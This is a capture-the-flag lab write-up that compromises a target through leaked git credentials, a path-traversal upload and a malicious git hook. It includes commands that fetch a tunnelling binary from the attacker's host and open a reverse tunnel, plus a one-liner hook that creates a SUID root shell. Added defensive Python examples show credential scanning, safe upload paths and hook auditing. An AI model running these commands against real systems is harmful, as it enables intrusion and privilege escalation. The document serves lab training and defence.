First, a full TCP port scan of the target:

```bash
nmap -p- --min-rate 10000 10.10.11.164 -Pn
```

After identifying the open ports, let's run a more detailed scan against just those ports:

```bash
nmap -A -sC -sV -p22,80 10.10.11.164 -Pn
```

Next, directory enumeration with gobuster:

```bash
gobuster dir -u http://10.10.11.164/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 40
```

The /download endpoint serves a source.zip file, which I download and extract.

The archive contains a .git directory, so I change into it and enumerate the git repository.

First, I list the branches of the repository with `git branch -a`.

I switch from the public branch to the dev branch with `git checkout`:

```bash
git checkout dev
```

Let's look at the recent commits with `git log`:

```bash
git log --name-only --oneline
```

I restore app/.vscode/settings.json as it was in commit a76f8f7:

```bash
git checkout a76f8f7 -- app/.vscode/settings.json
```

This settings.json file contains credentials:

```
dev01:Soulless_Developer#2022
```
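Credentials committed to a git repository stay in its history even after they are removed, and a branch that never ships still ships when the whole .git directory is exposed as it was here. As an added example (not part of this write-up), the following Python scanner flags credential-looking key/value pairs and user:password@ URLs in a file, a diff, or the full output of `git log -p --all`. The settings.json sample below is constructed for illustration (the dev01 username is reused from this write-up only as a sample value), and the key-name patterns are an assumption about what such files usually contain.

```python
"""Scan text for committed credentials.

Added example, not part of the original write-up. Works on a file, a diff, or
the full output of `git log -p --all`; the sample settings.json is constructed.
"""
import math
import re
import subprocess
import sys

# Config keys that commonly carry secrets, followed by a quoted value.
KEY_RE = re.compile(
    r'["\']?(?P<key>[a-z0-9_.-]*(?:password|passwd|pwd|secret|token|api[_-]?key))["\']?'
    r'\s*[:=]\s*["\'](?P<value>[^"\']{4,})["\']',
    re.IGNORECASE,
)
# user:password@host embedded in a URL (git remotes, database connection strings).
URL_CRED_RE = re.compile(
    r'[a-z][a-z0-9+.-]*://(?P<user>[^:/@\s]+):(?P<value>[^@\s]+)@', re.IGNORECASE
)

# Constructed sample resembling an editor settings file committed by mistake.
SAMPLE_SETTINGS_JSON = '''{
    "python.pythonPath": "/usr/bin/python3",
    "sqltools.connections": [
        {
            "name": "dev",
            "username": "dev01",
            "password": "example-Dev-Pass-2022"
        }
    ],
    "git.remote": "http://dev01:example-Dev-Pass-2022@gitea.internal:3000/dev01/app.git"
}'''


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; random tokens score high, words score low."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def redact(value: str) -> str:
    """Keep only the first two characters so a report does not re-leak the secret."""
    return value[:2] + "*" * (len(value) - 2)


def scan_text(text: str, source: str = "<text>") -> list:
    """One finding per credential-looking line, with the value redacted."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rx in (KEY_RE, URL_CRED_RE):
            m = rx.search(line)
            if m is None:
                continue
            value = m.group("value")
            key = m.groupdict().get("key") or "url:" + m.group("user")
            findings.append({
                "source": source,
                "line": lineno,
                "key": key,
                "redacted": redact(value),
                "entropy": round(shannon_entropy(value), 2),
            })
            break  # one finding per line is enough
    return findings


def scan_repo_history(repo_path: str) -> list:
    """Scan every line of every commit on every branch.

    A secret deleted in a later commit is still in history, and a branch that
    never ships still ships when .git itself is exposed, so removed lines and
    all refs are scanned, not just HEAD. Reported line numbers refer to the
    log output, not to the source file.
    """
    diff = subprocess.run(
        ["git", "-C", repo_path, "log", "-p", "--all", "--no-color"],
        check=True, capture_output=True, text=True,
    ).stdout
    return scan_text(diff, source=f"{repo_path} (git log -p --all)")


if __name__ == "__main__":
    # With a repository path: scan its full history. Without: scan the sample.
    target = sys.argv[1] if len(sys.argv) > 1 else None
    results = scan_repo_history(target) if target else scan_text(SAMPLE_SETTINGS_JSON, "settings.json")
    for f in results:
        print(f"{f['source']}:{f['line']}: {f['key']} = {f['redacted']} (entropy {f['entropy']})")
```

Run it on the sample and it reports the password line and the credential embedded in the remote URL, with the values masked. Pointing it at a checkout scans all branches, which is the case that matters when a dev branch is the one holding the secret.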

Browsing to the /console endpoint shows the Flask (Werkzeug) debugger console, but it is protected by a PIN.

I found a blog post describing how to work out this PIN.

Another way to get a shell is easier for me: the file upload writes the uploaded file to a location I choose.

That location is /app/app/views.py, which I replace with a views.py containing a reverse shell.

I upload this malicious views.py through the file upload, intercepting the upload request so that the file is written to that path.

Now, browsing to the /dr4ks endpoint triggers the reverse shell.

I get a reverse shell on my listener on port 1337.
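The upload bug used above (the application writes the uploaded file to whatever path the request names, so the running app's views.py can be overwritten) is an arbitrary-write / path-traversal flaw. As an added example, not code from the target application, here is how an upload handler should resolve its destination: a dedicated upload root outside the code tree, a strict single-component filename check, and a realpath containment check as an independent second layer. The `/srv/uploads` root and the filenames are constructed; `werkzeug.utils.secure_filename` is the library equivalent of the filename step.

```python
"""Resolve an upload's destination path safely.

Added example, not code from the target application. The upload root and the
client-supplied filenames are constructed for illustration.
"""
import os
import re

# Allowed shape for a stored filename: one path component, no leading dot.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9._-]{0,127}")


def validate_filename(name: str) -> str:
    """Accept only a plain filename; reject anything that carries a path.

    os.path.basename(name) != name catches "/app/app/views.py" and "../x";
    fullmatch against _SAFE_NAME rejects backslashes, NUL bytes, newlines,
    leading dots and odd characters. Rejecting (rather than silently
    stripping the directory part) means a traversal attempt surfaces as an
    error that can be logged.
    """
    if not name or os.path.basename(name) != name or not _SAFE_NAME.fullmatch(name):
        raise ValueError(f"invalid filename: {name!r}")
    return name


def resolve_upload_path(upload_root: str, client_filename: str) -> str:
    """Return the absolute destination inside upload_root, or raise ValueError.

    The vulnerable pattern is os.path.join(upload_root, client_filename): with
    an absolute client name join() discards upload_root entirely, and "../"
    segments walk out of it. Here the name is validated first, and the
    resolved result is checked against the resolved root as a second,
    independent layer (this also covers an upload root containing symlinks).
    """
    root = os.path.realpath(upload_root)
    dest = os.path.realpath(os.path.join(root, validate_filename(client_filename)))
    if os.path.commonpath([root, dest]) != root:
        raise ValueError(f"upload escapes root: {client_filename!r}")
    return dest


def is_safe_upload(upload_root: str, client_filename: str) -> bool:
    """Convenience wrapper: True if the name would be accepted."""
    try:
        resolve_upload_path(upload_root, client_filename)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: one legitimate name, two traversal attempts.
    for name in ("report.pdf", "/app/app/views.py", "../../app/app/views.py"):
        print(name, "->", "accepted" if is_safe_upload("/srv/uploads", name) else "rejected")
```

The important design choice is that the upload root is a directory the web application only ever reads uploads from; as long as no Python module is imported from it, even a file named views.py landing there is inert. Logging the ValueError gives a detection signal for traversal attempts.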

Let's upgrade it to an interactive shell:

```bash
python3 -c 'import pty; pty.spawn("sh")'
# press Ctrl+Z to background the shell, then on the local terminal:
stty raw -echo; fg
export TERM=xterm
export SHELL=bash
```

Now that I have a shell: my nmap scan showed a service running on port 3000, so let's request it from the box with wget:

```bash
wget 172.17.0.1:3000 -O-
```

That's a Gitea instance. To reach it from my machine I'll set up HTTP tunneling.

I do this with the chisel binary.

First, I start an HTTP server to serve the chisel binary to the target:

```bash
python3 -m http.server --bind 10.10.14.10 8080
```

Then, on the target, I fetch the file with wget:

```bash
wget http://10.10.14.10:8080/chisel_1.9.1_linux_amd64
```

To create the HTTP tunnel I first need a listener, so I start a chisel server on my machine in reverse mode:

```bash
chisel server -p 8000 --reverse
```

Then, on the target, I connect back and reverse-forward port 3000 (the Gitea service at 172.17.0.1:3000) to my machine:

```bash
./chisel_1.9.1_linux_amd64 client 10.10.14.10:8000 R:3000:172.17.0.1:3000
```

Browsing to localhost:3000 now shows the Gitea server.

I log in to Gitea with the credentials recovered from the repository's commit history:

```
dev01:Soulless_Developer#2022
```

In a repository there I find a private SSH key (id_rsa).

I copy the key into a local id_rsa file, restrict its permissions, and use it to SSH in as dev01:

```bash
chmod 600 id_rsa
ssh -i id_rsa dev01@10.10.11.164
```

This gives me the user flag (user.txt).

Next, I upload pspy64 to the machine and run it to watch for scheduled processes.

I see an interesting script being executed: /usr/local/bin/git-sync.

Reading the file shows it is a bash script that runs git commands in the repository.

Git hooks are scripts that git runs on various repository events, so I can abuse the pre-commit hook.

I write a hook that copies /bin/bash to /tmp/dr4ks, makes it root-owned and sets the SUID bit:

```bash
echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/dr4ks\nchown root:root /tmp/dr4ks\nchmod 4777 /tmp/dr4ks' > pre-commit
chmod +x pre-commit
```

Once the hook has fired, I run the /tmp/dr4ks copy of bash with the -p option, which makes bash keep the root effective uid, and get a root shell.

This gives me the root flag (root.txt).
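The privilege escalation works because a privileged scheduled job runs git inside a repository that a low-privileged user can write to, so the user's hook executes with the job's privileges. As an added example, not the write-up's git-sync script (whose contents are not shown here), the Python below shows the checks such a job should make before touching the repository: refuse if the repository is not owned by the account the job runs as (the same idea as git's own safe.directory "dubious ownership" check in Git 2.35.2 and later), refuse if it is group- or world-writable, refuse if executable hooks are present, and run git with core.hooksPath pointed at /dev/null so neither repo-local hooks nor a repo-local config can run code. The add/commit/push steps in `safe_sync` are an assumption about what a sync job does, and the demo repository is constructed in a temporary directory.

```python
"""Pre-flight checks for a privileged git sync job.

Added example, not the write-up's git-sync script (its contents are not shown).
Assumes a scheduled job running as one account (root in the write-up) that runs
git in a repository another user can write to. The demo repository is
constructed in a temporary directory.
"""
import os
import stat
import subprocess
import tempfile

WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH
EXECUTABLE = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH


def audit_repo(repo: str, sync_uid: int) -> list:
    """Return the reasons it is unsafe to run git in `repo` as `sync_uid` (empty = safe)."""
    findings = []
    st = os.stat(repo)
    # Same idea as git's safe.directory check: a hook or .git/config planted by
    # the repository's owner would otherwise run with the job's privileges.
    if st.st_uid != sync_uid:
        findings.append(f"{repo}: owned by uid {st.st_uid}, job runs as uid {sync_uid}")
    if st.st_mode & WRITABLE_BY_OTHERS:
        findings.append(f"{repo}: writable by group/others")
    hooks = os.path.join(repo, ".git", "hooks")
    if os.path.isdir(hooks):
        for name in sorted(os.listdir(hooks)):
            path = os.path.join(hooks, name)
            # git only runs exactly-named hooks; the *.sample files are inert.
            if name.endswith(".sample") or not os.path.isfile(path):
                continue
            if os.stat(path).st_mode & EXECUTABLE:
                findings.append(f"{path}: executable hook present")
    return findings


def git_args(repo: str, *git_cmd: str) -> list:
    """git argv for the job, with hooks disabled on the command line.

    -c core.hooksPath=/dev/null points git at a location with no hooks, and a
    command-line -c overrides .git/config, so a repo-local core.hooksPath set
    by the repository owner cannot re-enable them.
    """
    return ["git", "-C", repo, "-c", "core.hooksPath=/dev/null", *git_cmd]


def safe_sync(repo: str, sync_uid=None) -> list:
    """Run the sync only if the audit is clean; return the findings that blocked it."""
    sync_uid = os.getuid() if sync_uid is None else sync_uid
    findings = audit_repo(repo, sync_uid)
    if findings:
        return findings
    # Constructed sync steps (assumed, the real script is not shown in the write-up).
    subprocess.run(git_args(repo, "add", "-A"), check=True)
    subprocess.run(git_args(repo, "commit", "-q", "-m", "sync"), check=False)  # "nothing to commit" is fine
    subprocess.run(git_args(repo, "push", "-q"), check=True)
    return []


def make_demo_repo() -> str:
    """Constructed layout: a world-writable repository with a planted pre-commit hook."""
    repo = tempfile.mkdtemp(prefix="git-sync-demo-")
    hooks = os.path.join(repo, ".git", "hooks")
    os.makedirs(hooks)
    hook = os.path.join(hooks, "pre-commit")
    with open(hook, "w") as fh:
        fh.write("#!/bin/sh\necho 'hook ran'\n")
    os.chmod(hook, 0o755)
    os.chmod(repo, 0o777)
    return repo


def demo() -> list:
    """Audit the constructed repository as the current user: owner matches, two findings remain."""
    return audit_repo(make_demo_repo(), os.getuid())


if __name__ == "__main__":
    for line in demo():
        print("BLOCKED:", line)
```

The stronger fix is not to run the job with elevated privileges at all: run it as the repository's owner (a user cron entry, for instance), so a planted hook gains nothing. The audit above is what to add when the job genuinely must run as another account, and its findings are worth logging since an executable hook appearing in a repository that never had one is itself a detection signal.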